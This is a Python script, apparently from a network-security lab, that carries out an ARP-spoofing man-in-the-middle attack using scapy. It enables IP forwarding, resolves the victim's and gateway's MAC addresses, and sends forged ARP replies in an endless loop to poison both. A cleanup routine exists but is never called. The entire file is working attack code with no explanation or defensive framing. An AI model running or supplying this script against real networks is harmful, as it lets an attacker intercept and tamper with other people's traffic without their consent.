attacker_script.py

1. import scapy.all as scapy
2. import sys
3. import os
4. import time
5. import argparse
6. import netifaces as ni
7.  
8. parser = argparse.ArgumentParser(description="Attacking script to be run in xterm.")
9. parser.add_argument(
10.     "-i", "--interface", type=str, required=True, help="Interface of the attacker"
11. )
12. parser.add_argument(
13.     "-v", "--victim", type=str, required=True, help="Victim's IP address"
14. )
15. parser.add_argument(
16.     "-g", "--gateway", type=str, required=True, help="Gateway's IP address"
17. )
18.  
19.  
20. def set_ip_forwarding(value):
21.     os.system(f"echo {value} > /proc/sys/net/ipv4/ip_forward")
22.  
23.  
24. def get_mac_by_IP(IP):
25.     scapy.conf.verb = 0
26.     ans, _ = scapy.srp(
27.         scapy.Ether(dst="ff:ff:ff:ff:ff:ff") / scapy.ARP(pdst=IP),
28.         timeout=2,
29.         iface=interface,
30.         inter=0.1,
31.     )
32.     for _, rcv in ans:
33.         return rcv.sprintf(r"%Ether.src%")
34.  
35.  
36. def reset_ARP():
37.     print("\n[*] Restoring Targets...")
38.     victim1_MAC = get_mac_by_IP(victim_IP)
39.     victim2_MAC = get_mac_by_IP(gateway_IP)
40.     scapy.send(
41.         scapy.ARP(
42.             op=2,
43.             pdst=gateway_IP,
44.             psrc=victim_IP,
45.             hwdst="ff:ff:ff:ff:ff:ff",
46.             hwsrc=victim1_MAC,
47.         ),
48.         count=7,
49.     )
50.     scapy.send(
51.         scapy.ARP(
52.             op=2,
53.             pdst=victim_IP,
54.             psrc=gateway_IP,
55.             hwdst="ff:ff:ff:ff:ff:ff",
56.             hwsrc=victim2_MAC,
57.         ),
58.         count=7,
59.     )
60.     set_ip_forwarding(0)
61.     print("[*] Shutting Down...")
62.     sys.exit(1)
63.  
64.  
65. def mitm():
66.     global attacker_MAC
67.  
68.     try:
69.         victim_MAC = get_mac_by_IP(victim_IP)
70.         print(f"victim: (IP={victim_IP}, MAC={victim_MAC})")
71.     except Exception:
72.         set_ip_forwarding(0)
73.         print("[!] Couldn't Find Victim MAC Address")
74.         print("[!] Exiting...")
75.         sys.exit(1)
76.  
77.     try:
78.         gateway_MAC = get_mac_by_IP(gateway_IP)
79.         print(f"gateway: (IP={gateway_IP}, MAC={gateway_MAC})")
80.     except Exception:
81.         set_ip_forwarding(0)
82.         print("[!] Couldn't Find Gateway MAC Address")
83.         print("[!] Exiting...")
84.         sys.exit(1)
85.     print("[*] Poisoning Targets...")
86.  
87.     pkt1 = scapy.ARP(
88.         op=2,
89.         # hwlen=6,
90.         # plen=4,
91.         pdst=victim_IP,
92.         psrc=gateway_IP,
93.         # hwsrc=attacker_MAC,
94.         hwdst=victim_MAC,
95.     )
96.     pkt2 = scapy.ARP(
97.         op=2,
98.         # hwlen=6,
99.         # plen=4,
100.         pdst=gateway_IP,
101.         psrc=victim_IP,
102.         # hwsrc=attacker_MAC,
103.         hwdst=gateway_MAC,
104.     )
105.     pkt1.show()
106.     pkt2.show()
107.  
108.     while 1:
109.         # try:
110.         #     spoof(victim2_MAC, victim1_MAC)
111.         #     time.sleep(1.5)
112.         # except KeyboardInterrupt:
113.         #     reset_ARP()
114.         scapy.send(pkt1)
115.         scapy.send(pkt2)
116.         print("Packets Sent")
117.         time.sleep(1.5)
118.  
119.  
120. if __name__ == "__main__":
121.     args = parser.parse_args()
122.     interface = args.interface
123.     attacker_IP = ni.ifaddresses(interface)[ni.AF_INET][0]["addr"]
124.     attacker_MAC = ni.ifaddresses(interface)[ni.AF_LINK][0]["addr"]
125.     print(f"Attacker: (IP={attacker_IP}, MAC={attacker_MAC})")
126.     victim_IP = args.victim
127.     gateway_IP = args.gateway
128.     set_ip_forwarding(1)
129.     mitm()